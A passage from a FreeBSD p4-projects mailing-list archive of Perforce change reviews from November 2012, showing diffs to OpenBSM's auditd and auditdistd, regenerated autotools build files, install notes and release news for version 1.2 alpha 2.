don't want to rename now, because + * next trail file can get the same name and once that one is + * terminated also within one second it will overwrite the current + * one. Just keep writing to the same trail and wait for the next + * trigger from the kernel. + * FREEBSD KERNEL WAS UPDATED TO KEEP SENDING TRIGGERS, WHICH MIGHT + * NOT BE THE CASE FOR OTHER OSES. + * If the kernel will not keep sending triggers, trail file will not + * be terminated. + */ + if (lastfile == NULL) { + name = NULL; + } else { + name = strrchr(lastfile, '/'); + if (name != NULL) + name++; + } + if (name != NULL && strncmp(name, TS, TIMESTAMP_LEN) == 0) { + auditd_log_debug("Not ready to terminate trail file yet."); + return (0); + } err = auditd_swap_trail(TS, &newfile, audit_review_gid, audit_warn_getacdir); if (err != ADE_NOERR) { @@ -232,7 +255,7 @@ */ if (auditd_new_curlink(newfile) != 0) auditd_log_err("auditd_new_curlink(\"%s\") failed: %s: %m", - newfile, auditd_strerror(err)); + newfile, auditd_strerror(err)); lastfile = newfile; auditd_log_notice("New audit file is %s", newfile); @@ -295,6 +318,14 @@ { int err; + /* Configure trail files distribution. */ + err = auditd_set_dist(); + if (err) { + auditd_log_err("auditd_set_dist() %s: %m", + auditd_strerror(err)); + } else + auditd_log_debug("Configured trail files distribution."); + if (do_trail_file() == -1) { auditd_log_err("Error creating audit trail file"); fail_exit(); @@ -341,7 +372,7 @@ close_all(void) { int err_ret = 0; - char TS[TIMESTAMP_LEN]; + char TS[TIMESTAMP_LEN + 1]; int err; int cond; time_t tt; @@ -364,7 +395,7 @@ */ auditd_set_state(AUD_STATE_DISABLED); - if (getTSstr(tt, TS, TIMESTAMP_LEN) == 0) + if (getTSstr(tt, TS, sizeof(TS)) == 0) close_lastfile(TS); if (lastfile != NULL) free(lastfile); ==== //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.am#4 (text+ko) ==== @@ -1,6 +1,6 @@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.am#3 $ -# +## +## $P4: //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.am#4 $ +## if USE_NATIVE_INCLUDES INCLUDES = -I$(top_builddir) -I$(top_srcdir) ==== //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.in#11 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.1 from Makefile.am. +# Makefile.in generated by automake 1.12.4 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. @@ -14,10 +14,6 @@ @SET_MAKE@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.in#10 $ -# - VPATH = @srcdir@ am__make_dryrun = \ { \ @@ -157,6 +153,9 @@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ +LEX = @LEX@ +LEXLIB = @LEXLIB@ +LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ @@ -188,6 +187,8 @@ SHELL = @SHELL@ STRIP = @STRIP@ VERSION = @VERSION@ +YACC = @YACC@ +YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ @@ -226,6 +227,7 @@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ +mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ ==== //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.am#4 (text+ko) ==== @@ -1,6 +1,6 @@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.am#3 $ -# +## +## $P4: //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.am#4 $ +## if USE_NATIVE_INCLUDES INCLUDES = -I$(top_builddir) -I$(top_srcdir) ==== //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.in#13 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.1 from Makefile.am. +# Makefile.in generated by automake 1.12.4 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. @@ -14,10 +14,6 @@ @SET_MAKE@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.in#12 $ -# - VPATH = @srcdir@ am__make_dryrun = \ { \ @@ -156,6 +152,9 @@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ +LEX = @LEX@ +LEXLIB = @LEXLIB@ +LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ @@ -187,6 +186,8 @@ SHELL = @SHELL@ STRIP = @STRIP@ VERSION = @VERSION@ +YACC = @YACC@ +YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ @@ -225,6 +226,7 @@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ +mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ ==== //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.am#4 (text+ko) ==== @@ -1,6 +1,6 @@ -# -# $P4: //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.am#3 $ -# +## +## $P4: //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.am#4 $ +## if USE_NATIVE_INCLUDES INCLUDES = -I$(top_builddir) -I$(top_srcdir) ==== //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.in#13 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.1 from Makefile.am. >>> TRUNCATED FOR MAIL (1000 lines) <<< From owner-p4-projects@FreeBSD.ORG Sun Nov 18 23:49:19 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 3CAB9F27; Sun, 18 Nov 2012 23:49:19 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id F020EF25 for ; Sun, 18 Nov 2012 23:49:18 +0000 (UTC) (envelope-from pjd@freebsd.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id D649D8FC08 for ; Sun, 18 Nov 2012 23:49:18 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAINnI1o043038 for ; Sun, 18 Nov 2012 23:49:18 GMT (envelope-from pjd@freebsd.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAINnIVs043035 for perforce@freebsd.org; Sun, 18 Nov 2012 23:49:18 GMT (envelope-from pjd@freebsd.org) Date: Sun, 18 Nov 2012 23:49:18 GMT Message-Id: <201211182349.qAINnIVs043035@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to pjd@freebsd.org using -f From: Pawel Jakub Dawidek Subject: PERFORCE change 219807 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 18 Nov 2012 23:49:19 -0000 http://p4web.freebsd.org/@@219807?ac=10 Change 219807 by pjd@pjd_anger on 2012/11/18 23:48:46 IFpjd_openbsm. Affected files ... .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#2 integrate Differences ... ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#2 (text+ko) ==== @@ -27,7 +27,7 @@ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * - * $P4: //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#1 $ + * $P4: //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#2 $ */ #include "config.h" @@ -228,6 +228,11 @@ depth1_compression = -1; depth1_source[0] = '\0'; depth1_directory[0] = '\0'; + +#ifndef HAVE_AUDIT_SYSCALLS + pjdlog_error("Sender functionality is not available."); + return (1); +#endif } ; From owner-p4-projects@FreeBSD.ORG Tue Nov 20 11:35:59 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id 5F7BD486; Tue, 20 Nov 2012 11:35:59 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 1439C484 for ; Tue, 20 Nov 2012 11:35:59 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id EAF348FC13 for ; Tue, 20 Nov 2012 11:35:58 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKBZw8J025163 for ; Tue, 20 Nov 2012 11:35:58 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKBZwVN025160 for perforce@freebsd.org; Tue, 20 Nov 2012 11:35:58 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Tue, 20 Nov 2012 11:35:58 GMT Message-Id: <201211201135.qAKBZwVN025160@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219812 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 11:35:59 -0000 http://p4web.freebsd.org/@@219812?ac=10 Change 219812 by rwatson@rwatson_cinnamon on 2012/11/20 11:35:47 Regenerate autofoo for OpenBSM and add missing ylwrap. I'm using a slightly older autofoo than Pawel, but the result builds slightly more. Affected files ... .. //depot/projects/trustedbsd/openbsm/Makefile.in#14 edit .. //depot/projects/trustedbsd/openbsm/autom4te.cache/output.0#1 add .. //depot/projects/trustedbsd/openbsm/autom4te.cache/requests#1 add .. //depot/projects/trustedbsd/openbsm/autom4te.cache/traces.0#1 add .. //depot/projects/trustedbsd/openbsm/bin/Makefile.in#15 edit .. //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.in#16 edit .. //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.in#15 edit .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/Makefile.in#2 edit .. //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.in#12 edit .. //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.in#14 edit .. //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.in#14 edit .. //depot/projects/trustedbsd/openbsm/bsm/Makefile.in#14 edit .. //depot/projects/trustedbsd/openbsm/config/ylwrap#1 add .. //depot/projects/trustedbsd/openbsm/configure#65 edit .. //depot/projects/trustedbsd/openbsm/libauditd/Makefile.in#7 edit .. //depot/projects/trustedbsd/openbsm/libbsm/Makefile.in#19 edit .. //depot/projects/trustedbsd/openbsm/man/Makefile.in#13 edit .. //depot/projects/trustedbsd/openbsm/modules/Makefile.in#11 edit .. //depot/projects/trustedbsd/openbsm/modules/auditfilter_noop/Makefile.in#12 edit .. //depot/projects/trustedbsd/openbsm/sys/Makefile.in#8 edit .. //depot/projects/trustedbsd/openbsm/sys/bsm/Makefile.in#11 edit .. //depot/projects/trustedbsd/openbsm/test/Makefile.in#12 edit .. //depot/projects/trustedbsd/openbsm/test/bsm/Makefile.in#12 edit .. //depot/projects/trustedbsd/openbsm/tools/Makefile.in#15 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/Makefile.in#14 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. @@ -60,8 +60,7 @@ $(top_srcdir)/config/install-sh $(top_srcdir)/config/ltmain.sh \ $(top_srcdir)/config/missing $(top_srcdir)/configure INSTALL \ NEWS TODO config/config.guess config/config.sub config/depcomp \ - config/install-sh config/ltmain.sh config/missing \ - config/ylwrap + config/install-sh config/ltmain.sh config/missing ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 am__aclocal_m4_deps = $(top_srcdir)/configure.ac am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \ @@ -581,9 +580,9 @@ *.zip*) \ unzip $(distdir).zip ;;\ esac - chmod -R a-w $(distdir) - chmod u+w $(distdir) - mkdir $(distdir)/_build $(distdir)/_inst + chmod -R a-w $(distdir); chmod u+w $(distdir) + mkdir $(distdir)/_build + mkdir $(distdir)/_inst chmod a-w $(distdir) test -d $(distdir)/_build || exit 0; \ dc_install_base=`$(am__cd) $(distdir)/_inst && pwd | sed -e 's,^[^:\\/]:[\\/],/,'` \ ==== //depot/projects/trustedbsd/openbsm/bin/Makefile.in#15 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/bin/audit/Makefile.in#16 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/bin/auditd/Makefile.in#15 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/bin/auditdistd/Makefile.in#2 (text+kow) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/bin/auditfilterd/Makefile.in#12 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/bin/auditreduce/Makefile.in#14 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/bin/praudit/Makefile.in#14 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/bsm/Makefile.in#14 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/configure#65 (xtext) ==== @@ -1,5 +1,5 @@ #! /bin/sh -# From configure.ac P4: //depot/user/pjd/openbsm/configure.ac#19 . +# From configure.ac P4: //depot/projects/trustedbsd/openbsm/configure.ac#62 . # Guess values for system-dependent variables and create Makefiles. # Generated by GNU Autoconf 2.69 for OpenBSM 1.2alpha1. # ==== //depot/projects/trustedbsd/openbsm/libauditd/Makefile.in#7 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/libbsm/Makefile.in#19 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/man/Makefile.in#13 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/modules/Makefile.in#11 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/modules/auditfilter_noop/Makefile.in#12 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/sys/Makefile.in#8 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/sys/bsm/Makefile.in#11 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/test/Makefile.in#12 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/test/bsm/Makefile.in#12 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. ==== //depot/projects/trustedbsd/openbsm/tools/Makefile.in#15 (text+ko) ==== @@ -1,4 +1,4 @@ -# Makefile.in generated by automake 1.12.4 from Makefile.am. +# Makefile.in generated by automake 1.12.2 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2012 Free Software Foundation, Inc. From owner-p4-projects@FreeBSD.ORG Tue Nov 20 11:58:22 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id B24E3DF6; Tue, 20 Nov 2012 11:58:22 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 6DE50DF4 for ; Tue, 20 Nov 2012 11:58:22 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 526D78FC12 for ; Tue, 20 Nov 2012 11:58:22 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKBwMPQ025618 for ; Tue, 20 Nov 2012 11:58:22 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKBwMHD025615 for perforce@freebsd.org; Tue, 20 Nov 2012 11:58:22 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Tue, 20 Nov 2012 11:58:22 GMT Message-Id: <201211201158.qAKBwMHD025615@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219813 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 11:58:23 -0000 http://p4web.freebsd.org/@@219813?ac=10 Change 219813 by rwatson@rwatson_lethe on 2012/11/20 11:57:29 Update build instructions; BSD systems tend to simply include the required OpenSSL headers, but Ubuntu requires them to be manually installed in most cases. Affected files ... .. //depot/projects/trustedbsd/openbsm/INSTALL#7 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/INSTALL#7 (text+ko) ==== @@ -14,6 +14,12 @@ CFLAGS="-Wall -Werror" ./configure +On Linux systems, OpenSSL headers may have to be installed to support +encryption of on-the-wire audit streams using auditdistd; the following +appears to work on Ubuntu: + + sudo apt-get install libssl-dev + To install the library, binaries, and man pages, use: make install From owner-p4-projects@FreeBSD.ORG Tue Nov 20 12:09:34 2012 Return-Path: Delivered-To: p4-projects@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 32767) id B057A7F0; Tue, 20 Nov 2012 12:09:34 +0000 (UTC) Delivered-To: perforce@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 6DF457EE for ; Tue, 20 Nov 2012 12:09:34 +0000 (UTC) (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: from skunkworks.freebsd.org (skunkworks.freebsd.org [IPv6:2001:4f8:fff6::2d]) by mx1.freebsd.org (Postfix) with ESMTP id 50CEA8FC08 for ; Tue, 20 Nov 2012 12:09:34 +0000 (UTC) Received: from skunkworks.freebsd.org (localhost [127.0.0.1]) by skunkworks.freebsd.org (8.14.5/8.14.5) with ESMTP id qAKC9Y3O025949 for ; Tue, 20 Nov 2012 12:09:34 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Received: (from perforce@localhost) by skunkworks.freebsd.org (8.14.5/8.14.5/Submit) id qAKC9XDO025946 for perforce@freebsd.org; Tue, 20 Nov 2012 12:09:33 GMT (envelope-from bb+lists.freebsd.perforce@cyrus.watson.org) Date: Tue, 20 Nov 2012 12:09:33 GMT Message-Id: <201211201209.qAKC9XDO025946@skunkworks.freebsd.org> X-Authentication-Warning: skunkworks.freebsd.org: perforce set sender to bb+lists.freebsd.perforce@cyrus.watson.org using -f From: Robert Watson Subject: PERFORCE change 219814 for review To: Perforce Change Reviews Precedence: bulk X-BeenThere: p4-projects@freebsd.org X-Mailman-Version: 2.1.14 List-Id: p4 projects tree changes List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 20 Nov 2012 12:09:34 -0000 http://p4web.freebsd.org/@@219814?ac=10 Change 219814 by rwatson@rwatson_cinnamon on 2012/11/20 12:09:14 Update OpenBSM version number to 1.2a2, update NEWS for the addition of auditdistd; Pawel already appeared in the credits, but add the FreeBSD Foundation. Affected files ... .. //depot/projects/trustedbsd/openbsm/CREDITS#12 edit .. //depot/projects/trustedbsd/openbsm/NEWS#53 edit .. //depot/projects/trustedbsd/openbsm/VERSION#28 edit .. //depot/projects/trustedbsd/openbsm/aclocal.m4#7 edit .. //depot/projects/trustedbsd/openbsm/autom4te.cache/output.0#2 edit .. //depot/projects/trustedbsd/openbsm/autom4te.cache/traces.0#2 edit .. //depot/projects/trustedbsd/openbsm/bin/auditdistd/parse.y#3 edit .. //depot/projects/trustedbsd/openbsm/configure#66 edit Differences ... ==== //depot/projects/trustedbsd/openbsm/CREDITS#12 (text+ko) ==== @@ -34,6 +34,7 @@ Pawel Jakub Dawidek Joel Dahl Ryan Steinmetz + The FreeBSD Foundation In addition, Coverity, Inc.'s Prevent(tm) static analysis tool and Gimpel Software's FlexeLint tool were used to identify a number of bugs in the ==== //depot/projects/trustedbsd/openbsm/NEWS#53 (text+ko) ==== @@ -1,5 +1,14 @@ OpenBSM Version History +OpenBSM 1.2 alpha 2 + +- auditdistd, a distributed audit trail management daemon, has now been + merged. This allows trail files to be securely and reliably synced from + audited hosts to an audit server, and employs TLS encryption. Where + available, it uses Capsicum to sandbox the service. This work was + contributed by Pawel Jakub Dawidek under sponsorship from the FreeBSD + Foundation. + OpenBSM 1.2 alpha 1 - Add Capsicum-related error numbers for FreeBSD: ENOTCAPABLE, ECAPMODE. @@ -480,4 +489,4 @@ to support reloading of kernel event table. - Allow comments in /etc/security configuration files. -$P4: //depot/projects/trustedbsd/openbsm/NEWS#52 $ +$P4: //depot/projects/trustedbsd/openbsm/NEWS#53 $ ==== //depot/projects/trustedbsd/openbsm/VERSION#28 (text+ko) ==== @@ -1,1 +1,1 @@ -OPENBSM_1_2alpha1 +OPENBSM_1_2alpha2 ==== //depot/projects/trustedbsd/openbsm/aclocal.m4#7 (text+ko) ==== @@ -1,4 +1,4 @@ -# generated automatically by aclocal 1.12.4 -*- Autoconf -*- +# generated automatically by aclocal 1.12.2 -*- Autoconf -*- # Copyright (C) 1996-2012 Free Software Foundation, Inc. @@ -8612,6 +8612,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 8 + # AM_AUTOMAKE_VERSION(VERSION) # ---------------------------- # Automake X.Y traces this macro to ensure aclocal.m4 has been @@ -8621,7 +8623,7 @@ [am__api_version='1.12' dnl Some users find AM_AUTOMAKE_VERSION and mistake it for a way to dnl require some minimum version. Point them to the right macro. -m4_if([$1], [1.12.4], [], +m4_if([$1], [1.12.2], [], [AC_FATAL([Do not call $0, use AM_INIT_AUTOMAKE([$1]).])])dnl ]) @@ -8637,7 +8639,7 @@ # Call AM_AUTOMAKE_VERSION and AM_AUTOMAKE_VERSION so they can be traced. # This function is AC_REQUIREd by AM_INIT_AUTOMAKE. AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION], -[AM_AUTOMAKE_VERSION([1.12.4])dnl +[AM_AUTOMAKE_VERSION([1.12.2])dnl m4_ifndef([AC_AUTOCONF_VERSION], [m4_copy([m4_PACKAGE_VERSION], [AC_AUTOCONF_VERSION])])dnl _AM_AUTOCONF_VERSION(m4_defn([AC_AUTOCONF_VERSION]))]) @@ -8650,6 +8652,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 2 + # For projects using AC_CONFIG_AUX_DIR([foo]), Autoconf sets # $ac_aux_dir to '$srcdir/foo'. In other projects, it is set to # '$srcdir', '$srcdir/..', or '$srcdir/../..'. @@ -8703,6 +8707,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 10 + # AM_CONDITIONAL(NAME, SHELL-CONDITION) # ------------------------------------- # Define a conditional. @@ -8734,6 +8740,7 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 17 # There are a few dirty hacks below to avoid letting 'AC_PROG_CC' be # written in clear, in which case automake, when reading aclocal.m4, @@ -8925,6 +8932,7 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 6 # _AM_OUTPUT_DEPENDENCY_COMMANDS # ------------------------------ @@ -9001,6 +9009,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 19 + # This macro actually does too much. Some checks are only needed if # your package does certain things. But this isn't really a big deal. @@ -9152,6 +9162,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 8 + # AM_PROG_INSTALL_SH # ------------------ # Define $install_sh. @@ -9173,6 +9185,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 2 + # Check whether the underlying file-system supports filenames # with a leading dot. For instance MS-DOS doesn't. AC_DEFUN([AM_SET_LEADING_DOT], @@ -9195,6 +9209,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 7 + # AM_MAINTAINER_MODE([DEFAULT-MODE]) # ---------------------------------- # Control maintainer-specific portions of Makefiles. @@ -9232,6 +9248,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 5 + # AM_MAKE_INCLUDE() # ----------------- # Check to see how make treats includes. @@ -9282,6 +9300,8 @@ # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. +# serial 7 + # AM_MISSING_PROG(NAME, PROGRAM) # ------------------------------ AC_DEFUN([AM_MISSING_PROG], @@ -9289,6 +9309,7 @@ $1=${$1-"${am_missing_run}$2"} AC_SUBST($1)]) + # AM_MISSING_HAS_RUN # ------------------ # Define MISSING if not defined so far and test if it supports --run. @@ 